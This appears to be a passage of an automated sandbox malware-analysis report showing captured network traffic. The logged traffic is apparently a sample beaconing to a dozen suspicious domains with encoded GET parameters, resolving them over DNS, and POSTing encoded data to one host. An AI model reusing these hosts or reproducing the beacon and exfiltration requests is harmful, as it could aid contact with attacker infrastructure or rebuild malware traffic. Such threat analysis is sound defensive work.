37 b9 29 7b 24 4e cb 09 2f f0 e7 d6 ec 64 ca 15 b8 f3 6d 0a 3c 40 c4 44 99 2e d6 f0 fd f2 8b 7c a9 ea 9b 78 2f 1f 13 b3 f3 68 79 ec 40 fc 2b fc 02 65 0b a8 8a 1c 04 00 00 Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 11 Jan 2025 02:25:52 GMTserver: Apacheset-cookie: __tad=1736562352.5933549; expires=Tue, 09-Jan-2035 02:25:52 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 9b 15 dc 04 9b 37 03 c8 8a b3 15 1b 64 3b f3 c7 38 bf cc 3c 86 6d 47 f1 fc 1e e2 7e 2a ec a3 ce 68 27 3b 3f 21 8a 9d 09 b1 d8 a7 7a 3d c2 74 87 ea c1 52 fe e4 6e 7e 3a fd bf 76 c5 32 23 21 ea 3e 02 63 75 9b a3 f7 63 c7 ff fe 0e 63 57 9f 8f 1c 1d 78 8a e1 da d5 dc 68 88 d8 8d 77 5b 5b af ce 5e 2f 5e eb e5 5b 38 02 a3 47 10 d3 a6 cb 30 a2 af 37 da 75 ce cb f4 ac 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 1d 8c 5c 99 d5 26 b0 fa c3 0a ac b3 b8 ce aa 52 41 eb b1 91 ff 9c df 38 09 cb ac fa d0 19 7d 0b 2d 7a 1c 07 d5 12 fa 52 28 be 38 9c 9f ab 58 37 b9 29 7b 24 4e cb 09 2f f0 e7 d6 ec 64 ca 15 b8 f3 6d 0a 3c 40 c4 44 99 2e d6 f0 fd f2 8b 7c a9 ea 9b 78 2f 1f 13 b3 f3 68 79 ec 40 fc 2b fc 02 65 0b a8 8a 1c 04 00 00 Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e
                Source: global trafficHTTP traffic detected: GET /fev0/?6n=ZsYTLU62Pg4Ji1Y7yKx0R+43dnCF/DoTsxMfn/Xy/YyeGOVtNzq5pky0tbrPVR8P9zBOlb50dZZ9z8YaOITKn/+Qn9LZj60FJTogwY+WbqWfqijUMg==&P8dT=Gvw8Prk0H4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.thaor56.onlineUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /98j3/?6n=jo1iJOnj8ueGZPJABf2g0H8HuOKbJgV1DdtSaCSQL5v3UEYBE5VATgrqgu9yCYXU1qT81UG2HbOLQLBbZNDoMbyhLLQuZT4Au5NQMQhm1oIOAMIGMg==&P8dT=Gvw8Prk0H4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.optimismbank.xyzUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /r3zg/?P8dT=Gvw8Prk0H4&6n=du4jOMLkh7fLnmDuLYOIPa2Wp2ys3F+jaV3EKcXkS3D/yxi6pio40SibWtKrR6Fw1AeDGXhTcKeneAqCGOT06bVBzroOuQGNKcNgifQ36nJgHTvH4A== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.greenthub.lifeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /n2c9/?6n=3x/7f4nzUvf4Ssmpt1jlNGgCnZA9EhdoZs8QEOaGeCkTK2Ae1JBrg2/7Qirl6WfPBEFIuXRetS7qNq3tJgV/MvFKcHVyRNQ0lpxItwqxseE7Zdzalg==&P8dT=Gvw8Prk0H4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.laohub10.netUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /uf7y/?P8dT=Gvw8Prk0H4&6n=X8Xx4Xb3zOwIp/YnRuUSDS9+m9M27HztmVzPPBr+rNKRcobOh5vjSVUUxnTRN3k+HcX7svN7WZWipHk078Y7goc5xtOfckJoEDkF4EtN7gOpTNuRUA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.bankseedz.infoUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /3iym/?6n=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBYURW8ZeFt/JnnXLulZC8haYSThO7dC1CsRTUMY0QRbxSNQ==&P8dT=Gvw8Prk0H4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.madhf.techUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /hkgx/?6n=wgVoJ8uM9T0/Zez2re1RszMbFHmAlDimGOKD8PxxFFLfP5o8U05sZY6pknTlSn+/tcq1eo8k+yVAgRwnrxxUvSVPlvrZOPxTHwBspwPrhhwxEcqkEw==&P8dT=Gvw8Prk0H4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.xcvbj.asiaUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /31pt/?6n=TMDpBYanOquY9Rx7lbKrlsthbxkcecghv73C9/MKdrwqjZcj4ORMyeLFBityLVio1oCUCVJYl2rwHayMePC/X0BgzzdODOQRhsaLMWye0XS2e8Pang==&P8dT=Gvw8Prk0H4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.yc791022.asiaUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /p3j6/?6n=OVR2CF7p+NAClGW1MELAdr9D19OOCZyiV2x0cNqPuUjpn/Qhs1nMs1p1ZXuPw6NSEK+YKob7dwv93+8G93LPKWq9PBiy69Y2nadeDtRJ0gD55AbRoA==&P8dT=Gvw8Prk0H4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.43kdd.topUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /hxi5/?6n=/xN+QifpSgLb8oJZvOcEecwEXTNjyqH/ixYmgFld7FWiq7hEgfqLv6xcCSKy7O4D9GLUZYEuvgkAAG4+HQzECON3mfxJeBtjbn7k9Vw2XGkLNgd8mA==&P8dT=Gvw8Prk0H4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.jcsa.infoUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /j8pv/?P8dT=Gvw8Prk0H4&6n=JIuj9wxSnK6mEyWHgqme9cDOp2JPGD2avn5HAjA8ht24L6v+vQ9uqWv6ig59Dwg+VmGSo2u3Iy71OFL1070b7jcEPeQmL51Me3DwZ/KAlDYaGirikg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.1secondlending.oneUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /swhs/?6n=8xf1FTtyUpYkrTYPPLWUAP++SxZR47Hqllrz0dKQmws7hy/+lCnqv8MjCvT/8dHN8wn+YkpcLfbwvxo0J0bTQ0BhNgyFEMOmWGxKSf7yVXLPttL2EQ==&P8dT=Gvw8Prk0H4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.zkdamdjj.shopUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.thaor56.online
                Source: global trafficDNS traffic detected: DNS query: www.optimismbank.xyz
                Source: global trafficDNS traffic detected: DNS query: www.greenthub.life
                Source: global trafficDNS traffic detected: DNS query: www.laohub10.net
                Source: global trafficDNS traffic detected: DNS query: www.bankseedz.info
                Source: global trafficDNS traffic detected: DNS query: www.madhf.tech
                Source: global trafficDNS traffic detected: DNS query: www.xcvbj.asia
                Source: global trafficDNS traffic detected: DNS query: www.yc791022.asia
                Source: global trafficDNS traffic detected: DNS query: www.43kdd.top
                Source: global trafficDNS traffic detected: DNS query: www.jcsa.info
                Source: global trafficDNS traffic detected: DNS query: www.1secondlending.one
                Source: global trafficDNS traffic detected: DNS query: www.zkdamdjj.shop
                Source: unknownHTTP traffic detected: POST /98j3/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 191Connection: closeHost: www.optimismbank.xyzOrigin: http://www.optimismbank.xyzReferer: http://www.optimismbank.xyz/98j3/User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36Data Raw: 36 6e 3d 75 71 64 43 4b 2b 4f 2f 34 4b 6d 51 5a 74 78 75 65 35 57 6d 69 48 55 59 31 75 53 2b 47 31 6f 4a 62 6f 35 2f 54 32 4f 5a 46 2f 7a 48 58 6c 63 4b 41 64 45 52 49 6a 50 4a 75 62 46 61 65 4e 6e 64 30 59 79 64 34 57 79 76 48 62 4f 42 62 59 64 79 64 66 4c 45 50 49 62 6b 54 4b 4e 52 4f 54 6f 76 75 59 68 75 4a 41 49 75 31 5a 30 59 48 37 67 42 58 63 43 42 42 4f 61 49 34 67 6b 32 47 62 34 76 48 33 6c 36 51 46 4d 67 41 62 66 43 58 55 6e 45 5a 31 35 51 74 39 6b 51 6e 2b 48 70 6f 42 77 4d 70 45 55 71 41 76 65 39 33 6d 7a 58 62 41 6e 43 39 6c 4b 35 77 50 30 75 44 32 64 76 Data Ascii: 6n=uqdCK+O/4KmQZtxue5WmiHUY1uS+G1oJbo5/T2OZF/zHXlcKAdERIjPJubFaeNnd0Yyd4WyvHbOBbYdydfLEPIbkTKNROTovuYhuJAIu1Z0YH7gBXcCBBOaI4gk2Gb4vH3l6QFMgAbfCXUnEZ15Qt9kQn+HpoBwMpEUqAve93mzXbAnC9lK5wP0uD2dv
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 11 Jan 2025 02:24:33 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:25:06 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:25:08 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:25:11 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:25:13 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
